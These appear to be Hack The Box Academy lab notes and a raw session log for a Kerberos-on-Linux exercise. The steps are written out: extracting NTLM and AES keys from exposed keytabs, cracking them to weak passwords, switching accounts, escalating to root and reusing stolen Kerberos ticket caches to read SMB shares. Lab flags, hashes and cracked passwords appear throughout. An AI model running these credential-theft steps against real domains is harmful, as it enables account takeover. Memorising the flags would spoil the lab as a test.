Operation Name: Card Rhino
Execution Time: 5h
Hacking commands
# Lab notes: the command sequence for a Kerberos-on-Linux exercise against an
# AD-joined host (linux01, realm INLANEFREIGHT.HTB). Lines that begin with a
# `user@host:path$` prompt were copied from the remote session and are run
# there, not on the workstation.
## The trailing `// [!code ...]` tokens are diff/highlight annotations left by
## the documentation renderer. They are not shell comments, so drop them
## before reusing a line.

# Prepare the environment
export TARGET_IP=10.129.166.81 // [!code --]
export TARGET_IP=10.129.166.82 // [!code ++]
sudo vi /etc/hosts
# Add the following line to the hosts file
## NOTE(review): the address below is the old TARGET_IP (.81) while the
## current export above is .82. The session log further down uses yet other
## addresses, so use whatever the lab assigned for this spawn.
# 10.129.166.81 inlanefreight.htb
## -l passes the AD login `david@inlanefreight` as the user name; the plain
## `david` login was rejected in the session log below, and port 22 refused
## connections, hence -p 2222.
ssh -l david@inlanefreight inlanefreight.htb -p 2222 // [!code highlight]
# flag 1 / Gett1ng_Acc3$$_to_LINUX01
david@inlanefreight.htb@linux01:~$ cat flag.txt
# flag 2 / Linux Admins
## `realm list` prints the host's domain-join configuration; the answer is the
## permitted-groups value in its output.
david@inlanefreight.htb@linux01:~$ realm list
# flag 3 / carlos.keytab
## NOTE(review): the -name pattern is unquoted, so the shell expands it first
## if a matching file exists in the current directory; '*keytab*' avoids that.
## In the output below carlos.keytab is listed as -rw-rw-rw- root:root, while
## /etc/krb5.keytab is -rw------- root:root. A keytab holds a principal's
## long-term keys, so any keytab readable by other users is the finding to fix.
david@inlanefreight.htb@linux01:/tmp$ find / -name *keytab* -ls 2>/dev/null
## The file is binary; only the realm and principal names are legible.
david@inlanefreight.htb@linux01:/tmp$ cat /opt/specialfiles/carlos.keytab
# flag 4 / C@rl0s_1$_H3r3
## The tool reports an RC4-HMAC entry and prints it as the NTLM hash, next to
## the AES-256 and AES-128 keys for the same principal.
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
## use https://crackstation.net/ to crack the hash
## a738f92b3c08b424ec2d99589a9cce60 - Password5
## The password resolved through a public lookup table, i.e. it is a common
## one. Keytab permissions and password strength are the two controls that
## failed at this step.
su - carlos@inlanefreight.htb
cat flag.txt
# flag 5 / Mor3_4cce$$_m0r3_Pr1v$
## carlos's crontab runs kerberos_script_test.sh every 5 minutes; the script
## calls kinit for svc_workstations with the keytab stored under .scripts.
crontab -l
cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
cat /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
## Per the tool output below, svc_workstations.kt holds only an AES-256 key,
## whereas svc_workstations._all.kt in the same directory also carries the
## RC4-HMAC and AES-128 entries. A service-account keytab kept in a user's home
## directory extends a compromise of that user to the service account.
python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations._all.kt
## use https://crackstation.net/ to crack the hash
## 7247e8d4387e76996ff3f18a34316fdd - Password4
su - svc_workstations@inlanefreight.htb
cat flag.txt
# flag 6 / Ro0t_Pwn_K3yT4b
## Presumably svc_workstations has sudo rights on linux01; the session log
## below stops before this step — confirm.
sudo su
cd /root
cat flag.txt
# flag 7 / JuL1()_SH@re_fl@g
# Get julio's ticket, import it, and read the flag over SMB
## The credential caches in /tmp are -rw------- and owned by their user (see
## the `ls -la` output below), so copying julio's requires the root shell from
## the previous step. Cache file suffixes change per session; the names here
## differ from the ones in the captured /tmp listing.
cp /tmp/krb5cc_647401106_HRJDux .
cp /tmp/krb5cc_647401106_R6VB5C .
## NOTE(review): the value below ends in `.HTB`, which matches neither file
## copied above — probably a paste error; confirm the intended cache name.
export KRB5CCNAME=krb5cc_647401106_R6VB5C.HTB
## -k makes smbclient authenticate with the Kerberos cache named in KRB5CCNAME.
## NOTE(review): the share queried is //dc01/carlos although the ticket is
## julio's — confirm the share name.
smbclient //dc01/carlos -k -c ls
smbclient //dc01/carlos -k -c 'more flag.txt'
# flag 8 / Us1nG_KeyTab_Like_@_PRO
# Use the linux01$ Kerberos ticket to read the flag found in \\DC01\linux01
## This cache lives under SSSD's database directory; presumably it holds the
## host account's ticket — confirm with klist before relying on it.
cp /var/lib/sss/db/ccache_INLANEFREIGHT.HTB .
export KRB5CCNAME=ccache_INLANEFREIGHT.HTB
smbclient //dc01/linux01 -k -c ls
smbclient //dc01/linux01 -k -c 'more flag.txt'
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh -l david@inlanefreight inlanefreight.htb -p 2222
david@inlanefreight@inlanefreight.htb's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-128-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 15 Apr 2024 09:46:21 PM UTC
System load: 0.0 Processes: 212
Usage of /: 26.3% of 13.70GB Users logged in: 0
Memory usage: 25% IPv4 address for ens160: 172.16.1.15
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
3 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Oct 25 13:23:44 2022 from 172.16.1.5
david@inlanefreight.htb@linux01:~$ pwd
/home/david@inlanefreight.htb
david@inlanefreight.htb@linux01:~$ ls
flag.txt
david@inlanefreight.htb@linux01:~$ cat flag.txt
Gett1ng_Acc3$$_to_LINUX01
david@inlanefreight.htb@linux01:~$ flock
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ sudo /etc/hosts
sudo: /etc/hosts: command not found
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ sudo vi /etc/hosts
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb 2222
ssh: connect to host inlanefreight.htb port 22: Connection refused
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb 22
ssh: connect to host inlanefreight.htb port 22: Connection refused
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb -p 2222
The authenticity of host '[inlanefreight.htb]:2222 ([10.129.129.207]:2222)' can't be established.
ECDSA key fingerprint is SHA256:3I77Le3AqCEUd+1LBAraYTRTF74wwJZJiYcnwfF5yAs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[inlanefreight.htb]:2222,[10.129.129.207]:2222' (ECDSA) to the list of known hosts.
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
david@inlanefreight.htb: Permission denied (publickey,password).
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb -p 22
ssh: connect to host inlanefreight.htb port 22: Connection refused
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb -p 2222
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb@ -p 2222
ssh: Could not resolve hostname : Name or service not known
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb@ -p 2222
ssh: Could not resolve hostname : Name or service not known
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb@ -p 22
ssh: Could not resolve hostname : Name or service not known
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb -p 2222
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
david@inlanefreight.htb: Permission denied (publickey,password).
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ export TARGET_IP=10.129.129.207
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ xfreerdp /v:$TARGET_IP /u:administrator /p:Password2 /cert-ignore
[22:35:16:282] [5392:5393] [INFO][com.freerdp.crypto] - creating directory /home/htb-ac-385803/.config/freerdp
[22:35:16:283] [5392:5393] [INFO][com.freerdp.crypto] - creating directory [/home/htb-ac-385803/.config/freerdp/certs]
[22:35:16:283] [5392:5393] [INFO][com.freerdp.crypto] - created directory [/home/htb-ac-385803/.config/freerdp/server]
[22:35:16:984] [5392:5393] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[22:35:16:984] [5392:5393] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[22:35:16:984] [5392:5393] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[22:35:16:984] [5392:5393] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ xfreerdp /v:$TARGET_IP /u:david /p:Password2 /cert-ignore
[22:35:41:837] [5432:5433] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[22:35:41:837] [5432:5433] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[22:35:41:845] [5432:5433] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[22:35:41:846] [5432:5433] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[22:35:42:790] [5432:5433] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]
[22:38:25:158] [5432:5433] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[22:38:25:158] [5432:5433] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[22:38:25:158] [5432:5433] [INFO][com.freerdp.client.common] - Network disconnect!
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ export TARGET_IP=10.129.124.27
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ sudo vi /etc/hosts
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb -p 2222
Warning: Permanently added the ECDSA host key for IP address '[10.129.124.27]:2222' to the list of known hosts.
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb -pPassword2
Bad port 'Password2'
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb -p2222 Password2
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ man ssh
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh -l david -W inlanefreight.htb:2222
usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface]
[-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
[-E log_file] [-e escape_char] [-F configfile] [-I pkcs11]
[-i identity_file] [-J [user@]host[:port]] [-L address]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[-Q query_option] [-R address] [-S ctl_path] [-W host:port]
[-w local_tun[:remote_tun]] destination [command]
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh -l david -w inlanefreight.htb:2222
Bad tun device 'inlanefreight.htb:2222'
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh -l david@ inlanefreight.htb:2222
ssh: Could not resolve hostname inlanefreight.htb:2222: Name or service not known
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh -l david@ inlanefreight.htb -p 2222
david@@inlanefreight.htb's password:
Permission denied, please try again.
david@@inlanefreight.htb's password:
Permission denied, please try again.
david@@inlanefreight.htb's password:
^C
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh -l david inlanefreight.htb -p 2222
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh -l david@inlanefreight inlanefreight.htb -p 2222
david@inlanefreight@inlanefreight.htb's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-128-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 15 Apr 2024 09:46:21 PM UTC
System load: 0.0 Processes: 212
Usage of /: 26.3% of 13.70GB Users logged in: 0
Memory usage: 25% IPv4 address for ens160: 172.16.1.15
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
3 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Oct 25 13:23:44 2022 from 172.16.1.5
david@inlanefreight.htb@linux01:~$ pwd
/home/david@inlanefreight.htb
david@inlanefreight.htb@linux01:~$ ls
flag.txt
david@inlanefreight.htb@linux01:~$ cat flag.txt
Gett1ng_Acc3$$_to_LINUX01
david@inlanefreight.htb@linux01:~$ realm list
inlanefreight.htb
type: kerberos
realm-name: INLANEFREIGHT.HTB
domain-name: inlanefreight.htb
configured: kerberos-member
server-software: active-directory
client-software: sssd
required-package: sssd-tools
required-package: sssd
required-package: libnss-sss
required-package: libpam-sss
required-package: adcli
required-package: samba-common-bin
login-formats: %U@inlanefreight.htb
login-policy: allow-permitted-logins
permitted-logins: david@inlanefreight.htb, julio@inlanefreight.htb
permitted-groups: Linux Admins
david@inlanefreight.htb@linux01:~$ cd /tmp
david@inlanefreight.htb@linux01:/tmp$ ls
krb5cc_647401106_HRJDux
krb5cc_647401106_nSvcfS
krb5cc_647401107_ukWPne
krb5cc_647402606
snap.lxd
systemd-private-9396ad9227124ab18d8e07117017ce86-ModemManager.service-VNjzAi
systemd-private-9396ad9227124ab18d8e07117017ce86-systemd-logind.service-FwBDwh
systemd-private-9396ad9227124ab18d8e07117017ce86-systemd-resolved.service-tzq3Hf
systemd-private-9396ad9227124ab18d8e07117017ce86-systemd-timesyncd.service-q9f3Eg
vmware-root_696-2722173465
david@inlanefreight.htb@linux01:/tmp$ ls -la
total 68
drwxrwxrwt 13 root root 4096 Apr 15 21:46 .
drwxr-xr-x 20 root root 4096 Oct 6 2021 ..
drwxrwxrwt 2 root root 4096 Apr 15 21:39 .ICE-unix
drwxrwxrwt 2 root root 4096 Apr 15 21:39 .Test-unix
drwxrwxrwt 2 root root 4096 Apr 15 21:39 .X11-unix
drwxrwxrwt 2 root root 4096 Apr 15 21:39 .XIM-unix
drwxrwxrwt 2 root root 4096 Apr 15 21:39 .font-unix
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Apr 15 21:45 krb5cc_647401106_HRJDux
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1414 Apr 15 21:45 krb5cc_647401106_nSvcfS
-rw------- 1 david@inlanefreight.htb domain users@inlanefreight.htb 1406 Apr 15 21:46 krb5cc_647401107_ukWPne
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 3175 Apr 15 21:47 krb5cc_647402606
drwx------ 3 root root 4096 Apr 15 21:39 snap.lxd
drwx------ 3 root root 4096 Apr 15 21:39 systemd-private-9396ad9227124ab18d8e07117017ce86-ModemManager.service-VNjzAi
drwx------ 3 root root 4096 Apr 15 21:39 systemd-private-9396ad9227124ab18d8e07117017ce86-systemd-logind.service-FwBDwh
drwx------ 3 root root 4096 Apr 15 21:39 systemd-private-9396ad9227124ab18d8e07117017ce86-systemd-resolved.service-tzq3Hf
drwx------ 3 root root 4096 Apr 15 21:39 systemd-private-9396ad9227124ab18d8e07117017ce86-systemd-timesyncd.service-q9f3Eg
drwx------ 2 root root 4096 Apr 15 21:39 vmware-root_696-2722173465
david@inlanefreight.htb@linux01:/tmp$ find / -name *keytab* -ls 2>/dev/null
287437 4 -rw-r--r-- 1 root root 2110 Aug 9 2021 /usr/lib/python3/dist-packages/samba/tests/dckeytab.py
288276 4 -rw-r--r-- 1 root root 1871 Oct 4 2022 /usr/lib/python3/dist-packages/samba/tests/__pycache__/dckeytab.cpython-38.pyc
287720 24 -rw-r--r-- 1 root root 22768 Jul 18 2022 /usr/lib/x86_64-linux-gnu/samba/ldb/update_keytab.so
286812 28 -rw-r--r-- 1 root root 26856 Jul 18 2022 /usr/lib/x86_64-linux-gnu/samba/libnet-keytab.so.0
131610 4 -rw------- 1 root root 1348 Oct 4 2022 /etc/krb5.keytab
262464 12 -rw-r--r-- 1 root root 10015 Oct 4 2022 /opt/impacket/impacket/krb5/keytab.py
262619 4 -rw-rw-rw- 1 root root 216 Apr 15 21:50 /opt/specialfiles/carlos.keytab
131201 8 -rw-r--r-- 1 root root 4582 Oct 6 2022 /opt/keytabextract.py
287958 4 drwx------ 2 sssd sssd 4096 Jun 21 2022 /var/lib/sss/keytabs
398204 4 -rw-r--r-- 1 root root 380 Oct 4 2022 /var/lib/gems/2.7.0/doc/gssapi-1.3.1/ri/GSSAPI/Simple/set_keytab-i.ri
david@inlanefreight.htb@linux01:/tmp$ cat /etc/krb5.
krb5.conf krb5.keytab
david@inlanefreight.htb@linux01:/tmp$ cat /etc/krb5.
krb5.conf krb5.keytab
david@inlanefreight.htb@linux01:/tmp$ cat /etc/krb5.
krb5.conf krb5.keytab
david@inlanefreight.htb@linux01:/tmp$ cat /etc/krb5.keytab
cat: /etc/krb5.keytab: Permission denied
david@inlanefreight.htb@linux01:/tmp$ cat /opt/specialfiles/carlos.keytab
>INLANEFREIGHT.HTBcarlosf� �8�+�$�-�X���NINLANEFREIGHT.HTBcarlosf� B�
�Xic��땐Y^��|H�%�*�i��)C>INLANEFREIGHT.HTBcarlosf� �tի�O�H]a�david@inlanefreight.htb@linux01:/tmp$ ls/opt/
-bash: ls/opt/: No such file or directory
david@inlanefreight.htb@linux01:/tmp$ ls /opt
impacket keytabextract.py linikatz.sh specialfiles
david@inlanefreight.htb@linux01:/tmp$ python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : carlos/
NTLM HASH : a738f92b3c08b424ec2d99589a9cce60
AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f
AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4
david@inlanefreight.htb@linux01:/tmp$ su - carlos@inlanefreight.htb
Password:
su: Authentication failure
david@inlanefreight.htb@linux01:/tmp$ Password5
Password5: command not found
david@inlanefreight.htb@linux01:/tmp$ su - carlos@inlanefreight.htb
Password:
carlos@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647402606_91JyEJ
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
04/15/2024 21:56:23 04/16/2024 07:56:23 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 04/16/2024 21:56:23
carlos@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647402606_91JyEJ
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
04/15/2024 21:56:23 04/16/2024 07:56:23 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 04/16/2024 21:56:23
carlos@inlanefreight.htb@linux01:~$ ls
flag.txt script-test-results.txt
carlos@inlanefreight.htb@linux01:~$ cat flag.txt
C@rl0s_1$_H3r3
carlos@inlanefreight.htb@linux01:~$
linux01:/tmp$ ls/opt/
-bash: ls/opt/: No such file or directory
david@inlanefreight.htb@linux01:/tmp$ ls /opt
impacket keytabextract.py linikatz.sh specialfiles
david@inlanefreight.htb@linux01:/tmp$ python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : carlos/
NTLM HASH : a738f92b3c08b424ec2d99589a9cce60
AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f
AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4
david@inlanefreight.htb@linux01:/tmp$ su - carlos@inlanefreight.htb
Password:
su: Authentication failure
david@inlanefreight.htb@linux01:/tmp$ Password5
Password5: command not found
david@inlanefreight.htb@linux01:/tmp$ su - carlos@inlanefreight.htb
Password:
carlos@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647402606_91JyEJ
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
04/15/2024 21:56:23 04/16/2024 07:56:23 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 04/16/2024 21:56:23
carlos@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647402606_91JyEJ
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
04/15/2024 21:56:23 04/16/2024 07:56:23 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 04/16/2024 21:56:23
carlos@inlanefreight.htb@linux01:~$ ls
flag.txt script-test-results.txt
carlos@inlanefreight.htb@linux01:~$ cat flag.txt
C@rl0s_1$_H3r3
carlos@inlanefreight.htb@linux01:~$ cat script-test-results.txt
session setup failed: NT_STATUS_CONNECTION_RESET
carlos@inlanefreight.htb@linux01:~$ cat script-test-results.txt
session setup failed: NT_STATUS_CONNECTION_RESET
carlos@inlanefreight.htb@linux01:~$
carlos@inlanefreight.htb@linux01:~$ crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
*/5 * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
carlos@inlanefreight.htb@linux01:~$ cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k -no-pass > /home/carlos@inlanefreight.htb/script-test-results.txt
carlos@inlanefreight.htb@linux01:~$ cat /home/carlos@inlanefreight.htb/.scripts/svc_workstations.
cat: /home/carlos@inlanefreight.htb/.scripts/svc_workstations.: No such file or directory
carlos@inlanefreight.htb@linux01:~$ cat /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
XINLANEFREIGHT.HTBsvc_workstationsf�a
M *=T[�v#{7��V�B��wu=d(8��mcar
carlos@inlanefreight.htb@linux01:~$ python /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.
svc_workstations._all.kt svc_workstations.kt
carlos@inlanefreight.htb@linux01:~$ python /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.
svc_workstations._all.kt svc_workstations.kt
carlos@inlanefreight.htb@linux01:~$ python /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
Command 'python' not found, did you mean:
command 'python3' from deb python3
command 'python' from deb python-is-python3
carlos@inlanefreight.htb@linux01:~$ python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
[!] No RC4-HMAC located. Unable to extract NTLM hashes.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[!] Unable to identify any AES128-CTS-HMAC-SHA1 hashes.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : svc_workstations/
AES-256 HASH : 0c91040d4d05092a3d545bbf76237b3794c456ac42c8d577753d64283889da6d
carlos@inlanefreight.htb@linux01:~$ python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations._all.kt
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : svc_workstations/
NTLM HASH : 7247e8d4387e76996ff3f18a34316fdd
AES-256 HASH : 0c91040d4d05092a3d545bbf76237b3794c456ac42c8d577753d64283889da6d
AES-128 HASH : 3a7e52143531408f39101187acc80677
carlos@inlanefreight.htb@linux01:~$
carlos@inlanefreight.htb@linux01:~$ python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations._all.kt
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : svc_workstations/
NTLM HASH : 7247e8d4387e76996ff3f18a34316fdd
AES-256 HASH : 0c91040d4d05092a3d545bbf76237b3794c456ac42c8d577753d64283889da6d
AES-128 HASH : 3a7e52143531408f39101187acc80677
carlos@inlanefreight.htb@linux01:~$ su - svc_workstations
su: user svc_workstations does not exist
carlos@inlanefreight.htb@linux01:~$ su - svc_workstation
su: user svc_workstation does not exist
carlos@inlanefreight.htb@linux01:~$ su - svc_workstation@inlanefreight.htb
su: user svc_workstation@inlanefreight.htb does not exist
carlos@inlanefreight.htb@linux01:~$ su - svc_workstations@inlanefreight.htb
Password:
svc_workstations@inlanefreight.htb@linux01:~$ ls
flag.txt
svc_workstations@inlanefreight.htb@linux01:~$ cat flag.txt
Mor3_4cce$$_m0r3_Pr1v$
svc_workstations@inlanefreight.htb@linux01:~$